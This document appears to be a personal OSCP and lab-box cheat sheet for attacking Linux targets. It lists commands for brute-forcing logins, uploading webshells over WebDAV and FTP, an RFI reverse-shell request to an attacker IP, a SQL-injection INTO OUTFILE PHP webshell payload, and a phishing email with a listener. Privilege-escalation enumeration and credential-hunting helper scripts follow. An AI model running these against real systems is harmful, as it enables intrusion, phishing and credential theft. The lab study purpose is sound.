Linux

Based on the following PG Practice, PG Play, and PEN-200 boxes: Amaterasu, Apex, Astronaut, BBScute, BitForge, Blogger, Bratarina, Bullybox, ClamAV, Clue, Cockpit, Exfiltrated, Extplorer, Fanatastic, Fired, Flu, FunboxEasyEnum, Gaara, GlasgowSmile, Hawat, Hetemit, Hunit, LaVita, Levram, Loly, Mantis, Marketing, Mzeeav, Nibbles, Nukem, Payday, PC, Pebbles, Pelican, Peppo, Postfish, Potato, QuackerJack, Readys, Roquefort, Scrutiny, Snookums, Sorcerer, SpiderSociety, SPX, Stapler, Sybaris, Vmdak, Walla, WallpaperHub, Wombo, Workaholic, Xposedapi, Zab, ZenPhoto, Zipper, Crystal (OSCP A), Aero (OSCP A), Berlin (OSCP B), Kiero (OSCP B), Frankfurt (OSCP C), and Charlie (OSCP C).

Foothold

Port Scan

The nmap-scan script can be found here.

$ sudo nmap-scan <target-IP>
HTTP(S)
# Dirbust with a directory list (-ac auto-calibrates filtering, -e appends extensions to each word)
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php

# Dirbust with a file list
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ
# CLI tool
searchsploit <appName> <version>

# Google dork
site:github.com <appName> exploit poc

# RFI revshell (serve the PHP file from the attacker host and start the reverse-shell listener first; --proxy routes the request through Burp)
curl --path-as-is -s "http://10.10.10.10:4443/site/index.php?page=http://192.168.45.241:443/revshell_ivan.php" --proxy 127.0.0.1:8080

# Default credentials for the application
uv run creds search <appName>
# POST request (F= is a string that appears only in failed responses; use S= for a success string instead)
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER^&password=^PASS^:F=403'

# POST request (base64-encoded credentials; hydra encodes ^USER64^ and ^PASS64^ itself)
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER64^&password=^PASS64^:F=403'
# Connect to WebDAV
$ cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

# Upload a webshell directly
$ curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!
# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output

# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/
# Dump the repository
git-dumper http://target.lab/.git git_repo

# Write every commit (message and diff) to a single file
# (--format=%H yields exact hashes; grepping "commit" also matches message lines)
git -C git_repo log --format=%H | xargs git -C git_repo show > commits

# Open the commits file with VSCode
code commits
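Reading the whole commits file by hand is slow on a large repository. The helper below is an added example (not from the original notes): it walks every commit on every branch, prints only added lines that look like credentials together with the commit and file they came from, and lists files that were deleted at some point so they can be recovered with git show <commit>^:<path>. The keyword regex is an assumption to extend, and git_sample_repo builds a constructed throwaway repository purely so the helpers can be exercised offline.

```shell
#!/usr/bin/env bash
# Sweep a dumped git repository for secrets across its whole history.
# Added example; the keyword regex and the sample repository are assumptions.

git_secret_sweep() {
  repo="$1"
  # -p prints each commit's full diff; --all walks every branch and tag, not only HEAD's history.
  git -C "$repo" log -p --all --format='commit %H %s' |
    awk '
      /^commit /      { commit = substr($2, 1, 12) }   # short hash of the commit being read
      /^\+\+\+ b\//   { file = substr($0, 7) }         # path the following "+" lines belong to
      /^\+/ && !/^\+\+\+/ &&
      tolower($0) ~ /(passw|secret|token|api[_-]?key|private key|begin (rsa|openssh))/ {
        print commit " " file ": " substr($0, 2)
      }'
}

# Files removed at some point in history; recover one with: git show <commit>^:<path>
git_deleted_files() {
  git -C "$1" log --all --diff-filter=D --name-only --format= | grep -v '^$' | sort -u
}

# Constructed sample repository (one commit adds a config with a password, the next deletes it).
git_sample_repo() {
  d=$(mktemp -d)
  git -C "$d" init -q
  printf 'db_password = hunter2\n' > "$d/config.ini"
  git -C "$d" add config.ini
  git -C "$d" -c user.name=t -c user.email=t@example.invalid commit -q -m 'add config'
  git -C "$d" rm -q config.ini
  git -C "$d" -c user.name=t -c user.email=t@example.invalid commit -q -m 'remove config'
  printf '%s\n' "$d"
}
```

Usage against a dumped repo: git_secret_sweep git_repo; git_deleted_files git_repo. The deleted-file list matters because git-dumper recovers objects that no longer exist in the working tree, and a removed .env or backup file is where the credentials usually sit.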
# SQL injection from a saved login request (login.req captured in Burp)
sqlmap -r login.req --batch
Unique Ports

SMB
# Known SMB vulnerabilities
sudo nmap --script=smb-vuln\* -p445 10.10.10.10
# List shares and permissions
$ uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
$ nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

# Connect and download all files
$ smbclient //target/share -p 12445
Password for [WORKGROUP\x7331]:
Anonymous login successful        
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
FTP
# Anonymous login
ftp anonymous@target
ftp ftp@target

# Brute-force a known user
hydra -l <user> -P <passlist> ftp://<target>

# Download a directory recursively
wget -r ftp://ftp@target/<directory>/

# Upload a revshell (useful when the FTP root is also the web root)
ftp> put revshell_ivan.php
SMTP, POP3
# Enumerate valid users with VRFY (wordlist from username-anarchy)
smtp-user-enum -M VRFY -U anarchy_output -t 10.10.10.10

# Read a mailbox over POP3 with recovered credentials (LIST gives message numbers and sizes, RETR fetches one)
$ telnet 10.10.10.10 110
USER x7331
+OK x7331 is known here.
PASS Pass123!
+OK Welcome! 4 messages (4744 bytes)
LIST
+OK 4 messages, 4744 bytes
1 1342
2 963
3 1347
4 1092
RETR 1
# Email body with a malicious link
$ cat body.txt
Please click here to register: http://192.168.45.170/login.html

# Send an email to multiple email addresses (one address per line in emails.txt)
$ swaks --to $(paste -sd, emails.txt) --from it@target.off --header "Subject: ERP Registration link" --body @body.txt --server 192.168.161.137 --port 25

# Listener to catch the click on the link (port must match the URL in the body)
$ sudo nc -lvnp 80
Databases
# Connect (MySQL/MariaDB)
mysql -h kali -u x7331 -pPass123! --skip-ssl

# Webshell via UNION ... INTO OUTFILE (needs the FILE privilege, secure_file_priv unset and a web root writable by the DB user;
# the column count must match the original query; keep the trailing space after --)
'UNION SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/srv/http/webshell.php';-- 

# Connect (PostgreSQL)
psql -h 127.0.0.1 -p 5437 -U postgresql -W
SNMP
# Enterprise (vendor-specific) subtree; on Windows targets the user list sits under 1.3.6.1.4.1.77.1.2.25
snmpwalk -v2c -c public <target> 1.3.6.1.4.1

# Walk everything readable with the default community string
snmpwalk -v2c -c public <target>

# Grep for keywords
snmpwalk -v2c -c public <target> | grep -Ei 'user|admin|name|pass|password'

# System group (sysDescr, sysName, sysContact, ...)
snmpwalk -v2c -c public <target> 1.3.6.1.2.1.1

# Running processes (hrSWRunName); 1.3.6.1.2.1.25.4.2.1.5 (hrSWRunParameters) holds their command-line arguments
snmpwalk -v2c -c public <target> 1.3.6.1.2.1.25.4.2.1.2
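Process names on their own rarely help; the arguments do (database passwords and config paths show up there). The helper below is an added example, not part of the original notes: it reads a saved walk (snmpwalk -On ... > walk.txt, or the default "iso." output, which the script is assumed to receive), pairs each hrSWRunName entry with the hrSWRunParameters entry of the same index, and then greps the whole walk for credential keywords. The sample walk written by snmp_sample_walk is constructed, not captured from a real host.

```shell
#!/usr/bin/env bash
# Triage a saved snmpwalk: join process names with their arguments by OID index, then hunt keywords.
# Added example; assumes numeric OIDs in the walk (snmpwalk -On or default "iso." output).

snmp_triage() {
  walk="$1"
  echo "== processes (index name arguments) =="
  awk -F' = ' '
    # strip the "STRING: " type tag and surrounding quotes from a value
    function val(s) { sub(/^[A-Za-z0-9-]+: */, "", s); gsub(/^"|"$/, "", s); return s }
    # hrSWRunName: 1.3.6.1.2.1.25.4.2.1.2.<index>
    $1 ~ /^\.?(iso|1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.2\./ { n = split($1, a, "."); name[a[n]] = val($2) }
    # hrSWRunParameters: 1.3.6.1.2.1.25.4.2.1.5.<index>
    $1 ~ /^\.?(iso|1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.5\./ { n = split($1, a, "."); args[a[n]] = val($2) }
    END { for (i in name) printf "%s %s %s\n", i, name[i], args[i] }
  ' "$walk" | sort -n
  echo "== credential keywords =="
  grep -Ei 'user|admin|pass|secret|key' "$walk" || true
}

# Constructed sample walk (not from a real host) so the triage can be run offline.
snmp_sample_walk() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
iso.3.6.1.2.1.1.5.0 = STRING: "target"
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.423 = STRING: "mysqld"
iso.3.6.1.2.1.25.4.2.1.2.512 = STRING: "backup.sh"
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: ""
iso.3.6.1.2.1.25.4.2.1.5.423 = STRING: "--datadir=/var/lib/mysql"
iso.3.6.1.2.1.25.4.2.1.5.512 = STRING: "-u backup --password=Winter2024"
EOF
  printf '%s\n' "$f"
}
```

Usage: snmpwalk -v2c -c public <target> -On > walk.txt; snmp_triage walk.txt. The join by index is the point: a process called backup.sh is uninteresting until its arguments show the password it was started with.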

Privilege Escalation

User Context
# Sudo rights
$ sudo -l

# Groups (docker, lxd, disk, adm are the interesting ones)
$ id

# Shell history
$ cat /home/<user>/.bash_history
Host Enumeration
# Enumerate SUIDs
find / -type f -perm -u=s 2>/dev/null

# Enumerate capabilities
getcap -r / 2>/dev/null

# Local TCP sockets
netstat -anot

# Cronjobs
cat /etc/crontab

# Environment variables
env

# Sudo version
sudo --version

# Kernel version
uname -a
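The SUID and capability listings above return dozens of entries on a normal host; the abusable ones are a short list. The helper below is an added example (not from the original notes): it runs the same find and getcap searches and flags binaries whose name GTFOBins lists as directly abusable when SUID, and capabilities that hand out root or read access to any file. Both lists are assumed subsets meant to be extended, and the root directory argument exists only so the helper can be pointed at a test tree.

```shell
#!/usr/bin/env bash
# Flag SUID binaries and file capabilities that are commonly abusable for privilege escalation.
# Added example; the abusable-name list (a subset of GTFOBins SUID entries) and the
# capability list are assumptions to extend.

suid_triage() {
  root="${1:-/}"
  # basenames that give a shell or arbitrary file read/write when SUID (assumed subset of GTFOBins)
  known='bash|sh|dash|zsh|find|vim|vim\.basic|nano|less|more|python[0-9.]*|perl|php[0-9.]*|ruby|env|cp|mv|awk|gawk|nmap|tar|zip|unzip|systemctl|docker|xxd|base64|tee|cat'
  find "$root" -type f -perm -u=s 2>/dev/null | while IFS= read -r f; do
    if printf '%s\n' "${f##*/}" | grep -Eqx "$known"; then
      printf '[!] %s\n' "$f"     # known abusable: check GTFOBins for the one-liner
    else
      printf '[ ] %s\n' "$f"     # still worth a look, but not a known quick win
    fi
  done
}

cap_triage() {
  root="${1:-/}"
  command -v getcap >/dev/null 2>&1 || { echo "getcap not installed" >&2; return 0; }
  # capabilities that let an unprivileged process become root or bypass file permissions
  getcap -r "$root" 2>/dev/null |
    grep -Ei 'cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner' || true
}
```

Usage on the target: suid_triage; cap_triage. Lines marked [!] go straight to GTFOBins; a python or perl with cap_setuid is the same as a SUID copy and is checked the same way.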
# linPEAS (served from the attacker host)
$ wget 192.168.45.216:443/linpeas.sh
$ chmod +x linpeas.sh
$ ./linpeas.sh

# pspy: watch processes and cronjobs fire without root
$ wget 192.168.45.216:443/pspy64
$ chmod +x pspy64
$ ./pspy64

# Search files for credentials (run from a likely directory such as the web root)
grep -rHi "password" . 2>/dev/null
SMB
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999
MySQL/MariaDB
# Connect to the local database with credentials found on the host (config files, .bash_history)
mysql -h 127.0.0.1 -u x7331 -pPass123! --skip-ssl
